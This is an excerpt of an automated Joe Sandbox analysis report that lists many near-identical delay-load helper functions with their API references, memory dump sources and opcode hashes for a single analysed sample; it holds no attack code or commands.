                    • Part of subcall function 00A0DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0DFD6
                    • Part of subcall function 00A0DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 704541c9cf2ad1808b5fd9cd65ecb9ad5420f5ff5fc7afc9325fea9c9190c6cc
                  • Instruction ID: 4c6c0999a2f30ce1b22f267587ec6f72a32b4d989e246d2cd25caf4398f60636
                  • Opcode Fuzzy Hash: 704541c9cf2ad1808b5fd9cd65ecb9ad5420f5ff5fc7afc9325fea9c9190c6cc
                  • Instruction Fuzzy Hash: 71A011A3ABC00BBEB0082280BE02C3A032CC8C0B20338CC2AB00AA00C0A88028080830
                  Function 00A0D965 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A0D8A3
                    • Part of subcall function 00A0DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0DFD6
                    • Part of subcall function 00A0DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 310e94c0bb5df6b99778fecd6c27272b2881c8d7699fb94baa188a35bc3c2d08
                  • Instruction ID: 4c6c0999a2f30ce1b22f267587ec6f72a32b4d989e246d2cd25caf4398f60636
                  • Opcode Fuzzy Hash: 310e94c0bb5df6b99778fecd6c27272b2881c8d7699fb94baa188a35bc3c2d08
                  • Instruction Fuzzy Hash: 71A011A3ABC00BBEB0082280BE02C3A032CC8C0B20338CC2AB00AA00C0A88028080830
                  Function 00A0D96F Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A0D8A3
                    • Part of subcall function 00A0DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0DFD6
                    • Part of subcall function 00A0DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 86a097a24a106b3610a51b919a071cf466f0e87e5210b6573810249538c4acab
                  • Instruction ID: 4c6c0999a2f30ce1b22f267587ec6f72a32b4d989e246d2cd25caf4398f60636
                  • Opcode Fuzzy Hash: 86a097a24a106b3610a51b919a071cf466f0e87e5210b6573810249538c4acab
                  • Instruction Fuzzy Hash: 71A011A3ABC00BBEB0082280BE02C3A032CC8C0B20338CC2AB00AA00C0A88028080830
                  Function 00A0D979 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A0D8A3
                    • Part of subcall function 00A0DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0DFD6
                    • Part of subcall function 00A0DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 97e7a9489009f45eff939e8b1fbe99ce67ff977fc992b0b27c577ebe944d5c68
                  • Instruction ID: 4c6c0999a2f30ce1b22f267587ec6f72a32b4d989e246d2cd25caf4398f60636
                  • Opcode Fuzzy Hash: 97e7a9489009f45eff939e8b1fbe99ce67ff977fc992b0b27c577ebe944d5c68
                  • Instruction Fuzzy Hash: 71A011A3ABC00BBEB0082280BE02C3A032CC8C0B20338CC2AB00AA00C0A88028080830
                  Function 00A0D951 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A0D8A3
                    • Part of subcall function 00A0DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0DFD6
                    • Part of subcall function 00A0DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 7c85fc4cf95f7291ef20a1d82b494b65fd116d0f6352a496df8cfac077670e57
                  • Instruction ID: 4c6c0999a2f30ce1b22f267587ec6f72a32b4d989e246d2cd25caf4398f60636
                  • Opcode Fuzzy Hash: 7c85fc4cf95f7291ef20a1d82b494b65fd116d0f6352a496df8cfac077670e57
                  • Instruction Fuzzy Hash: 71A011A3ABC00BBEB0082280BE02C3A032CC8C0B20338CC2AB00AA00C0A88028080830
                  Function 00A0D95B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A0D8A3
                    • Part of subcall function 00A0DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0DFD6
                    • Part of subcall function 00A0DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 6981217fcdc37f847fab1588b0433ebf2bd6f99807749b5a8c5b27c22f260dd3
                  • Instruction ID: 4c6c0999a2f30ce1b22f267587ec6f72a32b4d989e246d2cd25caf4398f60636
                  • Opcode Fuzzy Hash: 6981217fcdc37f847fab1588b0433ebf2bd6f99807749b5a8c5b27c22f260dd3
                  • Instruction Fuzzy Hash: 71A011A3ABC00BBEB0082280BE02C3A032CC8C0B20338CC2AB00AA00C0A88028080830
                  Function 00A0DAA5 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A0DAB2
                    • Part of subcall function 00A0DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0DFD6
                    • Part of subcall function 00A0DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: c20bb2e9d50518301cd09448e1aacf1a5ff03e441c6baddeb1ea742e4d620c27
                  • Instruction ID: 36dd52705e428e47cfd77fd64cc24bdff2111fc3a6fd26832b0bb0efc2bb27e5
                  • Opcode Fuzzy Hash: c20bb2e9d50518301cd09448e1aacf1a5ff03e441c6baddeb1ea742e4d620c27
                  • Instruction Fuzzy Hash: A4A012A337C0067C70087185BE02C3A031CD0C0B11330891AF006940C8558018044830
                  Function 00A0DAE8 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A0DAB2
                    • Part of subcall function 00A0DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0DFD6
                    • Part of subcall function 00A0DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 5dd821e239931dd8e60061357583753ac46cdfbdccdde88c58323e197d60fe1e
                  • Instruction ID: befbeb31be52a6c3288dcc0e4506cecbaa948e55dfca0218a7ae8ca7dcc7027c
                  • Opcode Fuzzy Hash: 5dd821e239931dd8e60061357583753ac46cdfbdccdde88c58323e197d60fe1e
                  • Instruction Fuzzy Hash: D0A002A767D117BD710871957E16D7A035CD4C4B513348D1AF506940C9558458455831
                  Function 00A0DAF2 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A0DAB2
                    • Part of subcall function 00A0DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0DFD6
                    • Part of subcall function 00A0DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 43599d02561c2358a638a450fe37fd1cf87659f9f7f67e0caf1505779f8e6952
                  • Instruction ID: befbeb31be52a6c3288dcc0e4506cecbaa948e55dfca0218a7ae8ca7dcc7027c
                  • Opcode Fuzzy Hash: 43599d02561c2358a638a450fe37fd1cf87659f9f7f67e0caf1505779f8e6952
                  • Instruction Fuzzy Hash: D0A002A767D117BD710871957E16D7A035CD4C4B513348D1AF506940C9558458455831
                  Function 00A0DAFC Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A0DAB2
                    • Part of subcall function 00A0DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0DFD6
                    • Part of subcall function 00A0DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: d2e8728db5fbdf94109b857dd50c16f0554da730fefbec15531ca06516b70061
                  • Instruction ID: befbeb31be52a6c3288dcc0e4506cecbaa948e55dfca0218a7ae8ca7dcc7027c
                  • Opcode Fuzzy Hash: d2e8728db5fbdf94109b857dd50c16f0554da730fefbec15531ca06516b70061
                  • Instruction Fuzzy Hash: D0A002A767D117BD710871957E16D7A035CD4C4B513348D1AF506940C9558458455831
                  Function 00A0DAC0 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A0DAB2
                    • Part of subcall function 00A0DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0DFD6
                    • Part of subcall function 00A0DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: a63962ee97f6a2cd95ff554ad2bf4ca4fcab1488db883ba4985d2d76fab331d4
                  • Instruction ID: befbeb31be52a6c3288dcc0e4506cecbaa948e55dfca0218a7ae8ca7dcc7027c
                  • Opcode Fuzzy Hash: a63962ee97f6a2cd95ff554ad2bf4ca4fcab1488db883ba4985d2d76fab331d4
                  • Instruction Fuzzy Hash: D0A002A767D117BD710871957E16D7A035CD4C4B513348D1AF506940C9558458455831
                  Function 00A0DACA Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A0DAB2
                    • Part of subcall function 00A0DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0DFD6
                    • Part of subcall function 00A0DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: c42072e6be21b5d5f43fca2ddc9e2afbab185edc7c88370893ae5903083974d9
                  • Instruction ID: befbeb31be52a6c3288dcc0e4506cecbaa948e55dfca0218a7ae8ca7dcc7027c
                  • Opcode Fuzzy Hash: c42072e6be21b5d5f43fca2ddc9e2afbab185edc7c88370893ae5903083974d9
                  • Instruction Fuzzy Hash: D0A002A767D117BD710871957E16D7A035CD4C4B513348D1AF506940C9558458455831
                  Function 00A0DBF7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A0DBD5
                    • Part of subcall function 00A0DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0DFD6
                    • Part of subcall function 00A0DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 2f00931c4aa1efe833b8044903ac2cb426c0272536aa2c13a2e1aac1345fa491
                  • Instruction ID: 436f71f4c0abd78371fa378e4796933ff36591cb9f02966682fba77e1c0f1005
                  • Opcode Fuzzy Hash: 2f00931c4aa1efe833b8044903ac2cb426c0272536aa2c13a2e1aac1345fa491
                  • Instruction Fuzzy Hash: F4A011AB2BC00BBCB00822803E0BCBA033CE8C0B203328C2ABA0A800C0AA800C080830
                  Function 00A0DC0B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A0DBD5
                    • Part of subcall function 00A0DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0DFD6
                    • Part of subcall function 00A0DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 9fc2a0e9cb7ee54daf6c3cdf72f1a3cbb5859832435ea7a44708d3fcc602115a
                  • Instruction ID: 436f71f4c0abd78371fa378e4796933ff36591cb9f02966682fba77e1c0f1005
                  • Opcode Fuzzy Hash: 9fc2a0e9cb7ee54daf6c3cdf72f1a3cbb5859832435ea7a44708d3fcc602115a
                  • Instruction Fuzzy Hash: F4A011AB2BC00BBCB00822803E0BCBA033CE8C0B203328C2ABA0A800C0AA800C080830
                  Function 00A0DC15 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A0DBD5
                    • Part of subcall function 00A0DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0DFD6
                    • Part of subcall function 00A0DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: d630589207c6d4b1e4b5f89c344db2fdacf94777acbdc4e1d057c54d31c95c14
                  • Instruction ID: 436f71f4c0abd78371fa378e4796933ff36591cb9f02966682fba77e1c0f1005
                  • Opcode Fuzzy Hash: d630589207c6d4b1e4b5f89c344db2fdacf94777acbdc4e1d057c54d31c95c14
                  • Instruction Fuzzy Hash: F4A011AB2BC00BBCB00822803E0BCBA033CE8C0B203328C2ABA0A800C0AA800C080830
                  Function 00A0DC1F Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A0DBD5
                    • Part of subcall function 00A0DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0DFD6
                    • Part of subcall function 00A0DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
